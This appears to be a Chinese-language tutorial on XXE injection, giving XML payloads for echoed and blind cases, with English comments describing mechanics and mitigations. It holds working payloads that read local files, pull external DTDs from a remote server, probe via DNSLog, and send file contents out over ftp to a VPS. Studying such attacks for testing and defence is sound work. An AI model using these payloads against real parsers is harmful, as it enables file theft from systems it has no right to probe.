分为有回显和无回显两种情况。
1 有回显
(1)读取本地文件
<?xml version="1.0" encoding="UTF-8"?>
<!-- Internal DTD subset: the general entity "cat" is declared as an external (SYSTEM) entity whose
     identifier is a local file URI. A parser that resolves external entities substitutes the file
     contents for &cat; inside <a>, so the result appears in the parsed output (the "echoed" case).
     Mitigation for any consumer of untrusted XML: disable DTD processing / external entity resolution. -->
<!DOCTYPE cat [<!ENTITY cat SYSTEM "file:///c:/123.txt" >]>
<a>&cat;</a>
文件位置及内容
(2) 加载服务器上的外部 DTD 文档
暂时无法实现
<?xml version="1.0" encoding="UTF-8"?>
<!-- Same shape as the previous document, but the SYSTEM identifier of "cat" is an http URL, so
     resolving the entity requires the parser to make an outbound request for cat.dtd (its content is
     listed below the snippet). The surrounding notes record that this variant could not be made to
     work in the author's setup. Outbound HTTP from an XML parser is a detection signal on its own. -->
<!DOCTYPE cat [<!ENTITY cat SYSTEM "http://29.189.89.300:8989/cat.dtd" >]>
<a>&cat;</a>
cat.dtd 文档的内容：
<!ENTITY cat SYSTEM "file:///c:/123.txt">
(3) 通过 DTD 参数实体引入外部 DTD 中的实体声明
暂时无法实现
<?xml version="1.0" encoding="UTF-8"?>
<!-- Here "cat" is a parameter entity (%cat;) fetched over http and referenced inside the internal
     subset, so whatever declarations the remote DTD contains are pulled into this document's DTD
     before &cat; is expanded in <a>. Disabling external DTD loading blocks the %cat; reference
     and therefore the whole chain. -->
<!DOCTYPE cat [<!ENTITY % cat SYSTEM "http://29.189.89.300:8989/cat.dtd" > %cat;]>
<a>&cat;</a>
文档内容
//dtd文件内容 :<!ENTITY cat SYSTEM "file:///c:/123.txt">
可以实现
2 无回显
(1) DNSLog 外带测试：用于确认解析器是否会发起外部请求
<?xml version="1.0" encoding="UTF-8"?>
<!-- Blind (no-echo) probe: the parameter entity %remote; points at an http URL and is referenced in
     the internal subset, so a parser with external entity resolution enabled issues an outbound
     request even though <root/> renders nothing. Defensively, this is why egress DNS/HTTP from XML
     parsing hosts should be monitored and DTD processing disabled for untrusted input. -->
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://vfmmco.ceye.io">
%remote;]>
<root/>
(2)读文件
vps 上放置的 dtd 内容:
%cat;
参考:<!ENTITY % cat "<!ENTITY % send SYSTEM 'ftp://vps的地址:2121/%file;'>">
%cat;
<?xml version="1.0" encoding="UTF-8"?>
<!-- Blind variant with two parameter entities in the internal subset: %file; is a local file URI and
     %dtd; is an http URL for cat.dtd. %dtd; and %send; are then referenced, so the document depends
     on the remote DTD to supply the "send" declaration (the fragment shown above the snippet).
     Both the remote fetch and the outbound reference are blocked by disabling DTD loading, and each
     leaves an outbound-connection trace that network monitoring can catch. -->
<!DOCTYPE cat [
<!ENTITY % file SYSTEM "file:///c:/123.txt">
<!ENTITY % dtd SYSTEM "http://29.189.89.300:8989/cat.dtd">
%dtd;
%send;
]>